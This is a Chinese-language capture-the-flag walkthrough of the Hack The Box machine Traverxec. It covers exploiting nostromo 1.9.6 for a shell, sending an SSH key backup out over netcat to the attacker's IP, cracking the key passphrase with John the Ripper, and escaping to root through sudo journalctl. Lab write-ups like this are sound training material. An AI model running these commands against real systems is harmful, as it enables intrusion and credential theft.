【HTB】Traverxec

常规扫端口：

nmap -A -sC 10.10.10.165

访问 80 端口，发现有个发邮件的功能

发现它的中间件是 nostromo 1.9.6

搜一下 exp

exp直接利用，得到 www-data 权限的 shell

看一下 /etc/passwd，发现有个叫 david 的用户

可以使用：python -c "import pty;pty.spawn('/bin/bash')"

来生成一个比较好看的终端样子，就像下面这样

cd 到 /var/nostromo/conf 看一下有啥，ls -al 起码要用 -a 啊，不要错过什么东西

cat 一下 nhttpd.conf ，发现了一个叫 public_www 的文件夹

进去看一下：

新开一个终端，nc -lvp 10001 >backup-ssh-identity-files.tgz 用来接收那个压缩包

shell 里面使用 nc 10.10.15.84 10001 < backup-ssh-identity-files.tgz

这样就把压缩包给下到本地 kali 机了

下载出来的文件里有 ssh 的密钥

使用 jhon 破解一下看看把

/usr/share/john/ssh2john.py /root/Desktop/home/david/.ssh/id_rsa > id_rsa.hash

先换成 jhon 能识别的格式

/sbin/john /root/Desktop/home/david/.ssh/id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

rockyou.txt 字典爆破一波

得到密钥密码，hunter

ssh 登录一波

拿到 user.txt

在 bin 目录下发现其他的东西

在窗口被拉小的时候会触发应用，可以获取root的权限

运行时，把窗口缩小一点，再输入!/bin/sh，成功获得root权限：

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

惊了

！？

上一次给我这种 这也行 的感觉还是做第五个 crackme 的时候

参考：

https://ca0y1h.top/Target_drone/HackTheBox/3.HTB-Traverxec-walkthrough/

https://www.lofter.com/lpost/1df46e99_1c73cc6b6